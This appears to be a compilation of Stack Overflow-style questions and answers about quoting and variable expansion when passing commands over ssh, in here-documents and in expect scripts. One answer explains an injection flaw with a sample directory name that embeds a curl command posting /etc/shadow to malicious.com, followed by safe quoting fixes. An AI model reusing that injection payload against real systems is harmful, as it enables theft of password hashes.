How to use specific shell during pseudo-tty allocation? - bash

I want to be able to execute remote command in bash instead of default zsh on remote machine (preferable without having to modify settings on remote machine)
Example:
ssh -t -t some-command-that-only-works-in-bash-to-execute-remotely

You can do this :
ssh user#host "bash -c \"some-command-that-only-works-in-bash-to-execute-remotely\""
Please be careful with quoting, however. The arguments to your ssh command will first undergo local expansions and word splitting, then be passed to ssh, to then be submitted to the remote shell and undergo a second round of (remote) expansion and word splitting.
For instance, this will echo the local value of LOGNAME :
ssh user#host "bash -c \"echo $LOGNAME\""
This will echo the remote value of LOGNAME :
ssh user#host "bash -c \"echo \$LOGNAME\""
ssh user#host 'bash -c "echo $LOGNAME"'
If you want to understand why, try replacing ssh with echo and see what command the remote end would receive.
You can also do this :
echo "some-command-that-only-works-in-bash" | ssh user#host bash
ssh user#host bash < <(echo "some-command-that-only-works-in-bash")
You could issue multiple commands with this method (one line each) and they would all be executed remotely. Piping the output of a function designed to issue several commands is useful once in a while, as is redirecting a local script so that it can be executed on the remote machine without having to be copied.

As mentioned in previous comments, here-document can be utilized as such:
me#mycomp ~ $ ssh me#127.0.0.1 "/bin/sh <<%
echo 'user\np#55word!' > ~/cf1
%"
me#127.0.0.1's password:
me#mycomp ~ $ cat ~/cf1
user
p#55word!
From the man page
The following redirection is often
called a “here-document”.
[n]<< delimiter
here-doc-text ...
delimiter
All the text on successive lines up
to the delimiter is saved away and
made available to the command on
standard input, or file descriptor n
if it is specified. If the delimiter
as specified on the initial line is
quoted, then the here-doc-text is
treated literally, otherwise the text
is subjected to parameter expansion,
command substitution, and arithmetic
expansion (as described in the sec‐
tion on “Expansions”). If the opera‐
tor is “<<-” instead of “<<”, then
leading tabs in the here-doc-text are
stripped.

Related

Sed Command (unterminated 's' command)

I am trying to add an argument to the flag batch start. This is the error it gives me. Any idea on how to fix this?
$ sed -i "s/batch_start.*/batch_start\ 1111/" /tmp/runfile
sed: -e expression #1, char 27: unterminated `s' command
The root problem is that the command is being sent over ssh; that means it's running through two levels of shell parsing, one on the local computer, then another on the remote computer. That means it goes through quote/escape parsing, application, and removal twice, so you need two "layers" of quoting/escaping.
The command in the last comment doesn't parse (mismatched quotes), but I can reproduce the error message with this command:
ssh remoteHost "sudo sed -i "s/batch_start.*/batch_start\ 1111/" /tmp/runfile"
This sort-of has two levels of quotes, but quotes don't nest, so it doesn't work. The local shell parses this as a double-quoted string "sudo sed -i ", then an unquoted section s/batch_start.*/batch_start\ 1111/ (which contains an escaped space, so it'll remove the escape), then another double-quoted section: " /tmp/runfile". Since there are no spaces between them, they all get passed to ssh as a single argument. You can see the post-parsing string by replacing ssh remoteHost with echo:
$ echo "sudo sed -i "s/batch_start.*/batch_start\ 1111/" /tmp/runfile"
sudo sed -i s/batch_start.*/batch_start 1111/ /tmp/runfile
...so that's the command the remote shell will execute. Since there's a space between s/batch_start.*/batch_start and 1111/, they get passed to sed as separate arguments, and it treats the first as the command to execute (which is missing a close /) and the second as a filename.
Solution: there are many ways to correct the quoting. You can use the echo trick to see what'll get sent to the remote shell. I tend to prefer single-quotes around the entire command, and then just quote normally inside that (as long as the inner command doesn't itself contain single-quotes). In this case, that means:
ssh remoteHost 'sudo sed -i "s/batch_start.*/batch_start 1111/" /tmp/runfile'
which executes this on the remote computer:
sudo sed -i "s/batch_start.*/batch_start 1111/" /tmp/runfile
(note that I removed the escape on the space.)

How do I call Awk Print Variable within Expect Script that uses Spawn?

I've been creating some basic system health checks, and one of the checks includes a yum repo health status that uses one of Chef's tools called 'knife'. However, when I try to awk a column, I get
can't read "4": no such variable.
Here is what I am currently using:
read -s -p "enter password: " pass
/usr/bin/expect << EOF
spawn knife ssh -m host1 "sudo bash -c \"yum repolist -v| grep Repo-name| awk '{print $4}'\" "
expect {
-nocase password: { send "$pass\r" }; expect eof }
}
EOF
I've tried other variations as well, such as replacing the awk single quotes with double curly braces, escaping the variable, and even setting the variable to the command, and keep getting the same negative results:
awk {{print $4}}
awk '{print \$4}'
awk '\{print \$4\}'
awk {\{print \$4\}}
Does anyone know how I can pass this awk column selector variable within a spawned knife ssh command that sends the variable to the ssh host?
This line:
spawn knife ssh -m host1 "sudo bash -c \"yum repolist -v|grep Repo-name|awk '{print $4}'\""
has many layers of quoting (Tcl/Expect, ssh, bash, awk), and it's quoting of different types. Such things are usually pretty nasty and can require using rather a lot of backslashes to persuade values to go through the outer layers unmolested. In particular, Tcl and the shell both want to get their hands on variables whose uses start with $ and continue with alphanumerics. (Backslashes that go in deep need to be themselves quoted with more backslashes, making the code hard to read and hard to understand precisely.)
spawn knife ssh -m host1 "sudo bash -c \"yum repolist -v|grep Repo-name|awk '{print \\\$4}'\""
However, there's one big advantage available to us: we can put much of the code into braces at the outer level as we are not actually substituting anything from Tcl in there.
spawn knife ssh -m host1 {sudo bash -c "yum repolist -v|grep Repo-name|awk '{print \$4}'"}
The thing inside the braces is conventional shell code, not Tcl. And in fact we can probably simplify further, as neither grep nor awk need to be elevated:
spawn knife ssh -m host1 {sudo bash -c "yum repolist -v"|grep Repo-name|awk '{print $4}'}
Depending on the sudo configuration, you might even be able to do this (which I'd actually rather people did on systems I controlled anyway, rather than giving general access to root shells out):
spawn knife ssh -m host1 {sudo yum repolist -v|grep Repo-name|awk '{print $4}'}
And if my awk is good enough, you can get rid of the grep like this:
spawn knife ssh -m host1 {sudo yum repolist -v|awk '/Repo-name/{print $4}'}
This is starting to look more manageable. However, if you want to substitute Repo-name for a Tcl variable, you need a little more work that reintroduces a backslash, but now it is all much tamer than before as there's fewer layers of complexity to create headaches.
set repo "Repo-name"
spawn knife ssh -m host1 "sudo yum repolist -v|awk '/$repo/{print \$4}'"
In practice, I'd be more likely to get rid of the awk entirely and do that part in Tcl code, as well as setting up key-based direct access to the root account, allowing avoiding the sudo, but that's getting rather beyond the scope of your original question.
Donal Fellows' helpful answer contains great analysis and advice.
To complement it with an explanation of why replacing $4 with \\\$4 worked:
The goal is ultimately for awk to see $4 as-is, so we must escape for all intermediate layers in which $ has special meaning.
I'll use a simplified command in the examples below.
Let's start by temporarily eliminating the shell layer, by quoting the opening here-doc delimiter as 'EOF', which makes the content behave like a single-quoted string; i.e., the shell treats the content as a literal, without applying expansions:
expect <<'EOF' # EOF is quoted -> literal here-doc
spawn bash -c "awk '{ print \$1 }' <<<'hi there'"
expect eof
EOF
Output:
spawn bash -c awk '{ print $1 }' <<<'hi there'
hi
Note that $1 had to be escaped as \$1 to prevent expect from interpreting it as an expect variable reference.
Given that the here-doc in your question uses an unquoted opening here-doc delimiter (EOF), the shell treats the content as if it were a double-quoted string; i.e, shell expansions are applied.
Given that the shell now expands the script first, we must add an extra layer of escaping for the shell, by prepending two extra \ to \$1:
expect <<EOF # EOF is unquoted -> shell expansions happen
spawn bash -c "awk '{ print \\\$1 }' <<<'hi there'"
expect eof
EOF
This yields the same output as above.
Based on the rules of parsing an unquoted here-doc (which, as stated, is parsed like a double-quoted string), the shell turns \\ into a single \, and \$1 into literal $1, combining to literal \$1, which is what the expect script needs to see.
(Verify with echo "\\\$1" in the shell.)
Simplifying the approach with command-line arguments and a quoted here-doc:
As you can see, the multiple layers of quoting (escaping) can get confusing.
One way to avoid problems is to:
use a quoted here-doc, so that the shell doesn't interpret it in any way, so you can then focus on expect's quoting needs
pass any shell variable values via command-line arguments, and reference them from inside the expect script as expressions (either directly or by assigning them to an expect variable first).
expect -f - 'hi there' <<'EOF'
set txt [lindex $argv 0]
spawn bash -c "awk '{ print \$1 }' <<<'$txt'"
expect eof
EOF
Text hi there is passed as the 1st (and only) command-line argument, which can be referenced as [lindex $argv 0] in the script.
(-f - simply explicitly tells expect to read its script from stdin, which is necessary here to distinguish the script from the arguments).
set txt ... creates expect variable $txt, which can then be used unquoted or as part of double-quoted strings.
To create literal strings in expect, use {...} (the equivalent of the shell's '...').

Escaping $ variable in sed over ssh command?

I have a command like this:
ssh user#hostname 'sed -e "s|foo|${bar}|" /home/data/base_out.sql > /home/data/out.sql'
The sed command is working in local shell. But it is not expanding the variable over ssh command. Thanks!
The rule is that within single quotes, parameters are not expanded. You have single quotes around the entire command.
Try this:
ssh user#hostname "sed -e 's|foo|$bar|' /home/data/base_out.sql > /home/data/out.sql"
Now $bar is expanded before the command string is passed as an argument to ssh, which is what you want.
I removed the curly braces around ${bar} because I believe they offer a false sense of security. In this case, they are not protecting you against any of the issues associated using shell variables in sed commands.

What does $"${#// /\\ }" mean in bash?

When I read a Hadoop deploy script, I found the following code:
ssh $HADOOP_SSH_OPTS $slave $"${#// /\\ }"
The "${#// /\\ }" input is a simple shell command (parameter expansion). Why add a $ before this command? What does this $"" mean?
This code is simply buggy: It intends to escape the local script's argument list such that arguments with spaces can be transported over ssh, but it does this badly (missing some kinds of whitespace -- and numerous classes of metacharacters -- in exploitable ways), and uses $"" syntax (performing a translation table lookup) without any comprehensible reason to do so.
The Wrong Thing (aka: What It's Supposed To Do, And How It Fails)
Part 1: Describing The Problem
Passing a series of arguments to SSH does not guarantee that those arguments will come out the way they went in! SSH flattens its argument list to a single string, and transmits only that string to the remote system.
Thus:
# you might try to do this...
ssh remotehost printf '%s\n' "hello world" "goodbye world"
...looks exactly the same to the remote system as:
# but it comes out exactly the same as this
ssh remotehost 'printf %s\n hello world goodbye world'
...thus removing the effect of the quotes. If you want the effect of the first command, what you actually need is something like this:
ssh remotehost "printf '%s\n' \"hello world\" \"goodbye world\""
...where the command, with its quotes, are passed as a single argument to SSH.
Part 2: The Attempted Fix
The syntax "${var//string/replacement}" evaluates to the contents of $var, but with every instance of string replaced with replacement.
The syntax "$#" expands to the full list of arguments given to the current script.
"${#//string/replacement}" expands to the full list of arguments, but with each instance of string in each argument replaced with replacement.
Thus, "${#// /\\ }" expands to the full list of arguments, but with each space replaced with a string that prepends a single backslash to this space.
It thus modifies this:
# would be right as a local command, but not over ssh!
ssh remotehost printf '%s\n' 'hello world' 'goodbye world'
To this:
# ...but with "${#// /\\ }", it becomes this:
ssh remotehost printf '%s\n' 'hello\ world' 'goodbye\ world'
...which SSH munges into this:
# ...which behaves just like this, which actually works:
ssh remotehost 'printf %s\n hello\ world goodbye\ world'
Looks great, right? Except it's not.
Aside: What's the leading $ in $"${#/...//...}" for?
It's a bug here. It's valid syntax, because $"" has a useful meaning in bash (looking up the string as English text to see if there's a translation to the current user's native language), but there's no legitimate reason to do a translation table lookup here.
Why That Code Is Dangerously Buggy
There's a lot more you need to escape than spaces to make something safe for shell evaluation!
Let's say that you were running the following:
# copy directory structure to remote machine
src=/home/someuser/files
while read -r path; do
ssh "$host" "mkdir -p $path"
done < <(find /home/someuser/files -type d -printf '%P\0')
Looks pretty safe, right? But let's say that someuser is sloppy about their file permissions (or malicious), and someone does this:
mkdir $'/home/someuser/files/$(curl\t-X\tPOST\t-d\t/etc/shadow\thttp://malicious.com/)/'
Oh, no! Now, if you run that script with root permissions, you'll get your /etc/shadow sent to malicious.com, for them to try to crack your passwords at their leisure -- and the code given in your question won't help, because it only backslash-escapes spaces, not tabs or newlines, and it doesn't do anything about $() or backticks or other characters that can control the shell.
The Right Thing (Option 1: Consuming Stdin)
A safe and correct way to escape an argument list to be transported over ssh follows:
#!/bin/bash
# tell bash to put a quoted string which will, if expanded by bash, evaluate
# to the original arguments to this script into cmd_str
printf -v cmd_str '%q ' "$#"
# on the remote system, run "bash -s", with the script to run fed on stdin
# this guarantees that the remote shell is bash, which printf %q quoted content
# to be parsed by.
ssh "$slave" "bash -s" <<EOF
$cmd_str
EOF
There are some limitations inherent in this approach -- most particularly, it requires the remote command's stdin to be used for script content -- but it's safe even if the remote /bin/sh doesn't support bash extensions such as $''.
The Right Thing (Option 2: Using Python)
Unlike both bash and ksh's printf %q, the Python standard library's pipes.quote() (moved in 3.x to shlex.quote()) is guaranteed to generate POSIX-compliant output. We can use it as such:
posix_quote() {
python -c 'import pipes, sys; print " ".join([pipes.quote(x) for x in sys.argv[1:]])' "$#"
}
cmd_str=$(posix_quote "$#")
ssh "$slave" "$cmd_str"
Arguments to the script which contain whitespace need to be surrounded by quotes on the command line.
The ${#// /\\ } will quote this whitespace so that the expansion which takes place next will keep the whitespace as part of the argument for another command.
Anyway, probably an example is in order. Create a tst.sh with above line and make executable.
echo '#!/bin/bash' > tst.sh
echo 'ssh $HADOOP_SSH_OPTS $slave $"${#// /\\ }"' >> tst.sh
chmod +x tst.sh
try to run a mkdir command on the remote server, aka slave, of a directory containing spaces, assuming you have access to that server with user id uid:
HADOOP_SSH_OPTS="-l uid" slave=server ./tst.sh mkdir "/tmp/dir with spaces"
Because of the quoting of whitespace taking place, you'll now have a dir with spaces directory in /tmp on the server owned by uid.
Check using ssh uid#server ls /tmp
And if you're in a different country and really wanted some non-english character, that's maintained by surrounding with the $"...", aka locale-specific.

read file in here document bash script

When I execute this, I get just empty lines as output
# /bin/bash <<- EOF
while read a
do
echo $a
done < /etc/fstab
EOF
If I copy the content of here-document into file and execute it, everything works as expected (I get content of /etc/fstab file).
Could anyone explain why?
UPDATE:
Answering a question about why would I need to pass here-doc to bash this way, here is what I'm actually trying to do:
ssh user#host /bin/bash <<- EOF
while read f; do
sed -i -e "s/$OLD_VAL/$NEW_VAL/g" $f
done < /tmp/list_of_files
EOF
Sed is complaining that $f is not set
In case someone bumps into this, here is a version that works:
# /bin/bash <<- EOF
while read a
do
echo \$a
done < /etc/fstab
EOF
The variable a is not defined in the parent bash script. It will be substituted with empty value before the here-document will be passed to a child bash. To avoid substitution a $-sign should be escaped with "\".
You dont need here document here. If you were trying a script you could do:
#!/bin/bash
while read a
do
echo "$a"
done < /etc/fstab
I do not have enough reputation here to add comments, so I am forced to answer instead.
First, you have multiple levels of shell going on. In your initial example, the syntax for your HERE doc was incorrect, but your edited update was correct. The <<- will remove one leading tab character (but not spaces) from each line of text until your EOF delimiter (which could have been named anything). Using << without the '-' would expect each line of the HEREdoc to start in column 0.
Next, you are using ssh getting your shell from a remote host. This also implies that your /tmp/list_of_files will also exist on the remote machine. This also means any local shell meta-character should be escaped to ensure it is passed to the program/location where you actually want it expanded.
I do not believe a HEREdoc is necessary, when you can pass a complete semicolon separated one-liner to ssh. This may also afford you some flexibility to let your local shell do some expansion before variables are passed to ssh or your remote shell.
OLD=' '
NEW=$'\t'
ssh -q user#host "for filename in \$(</tmp/list_of_files); do gsed -i.\$(date %s) -e 's/'$OLD'/'$NEW'/g' \$filename; done"
Let's not forget the -i is an in-place edit, not a flag to ignore the upper/lower case of our regex match. I like to create backups of my files any time I edit/change them so I have a history if/when anything breaks later.

Resources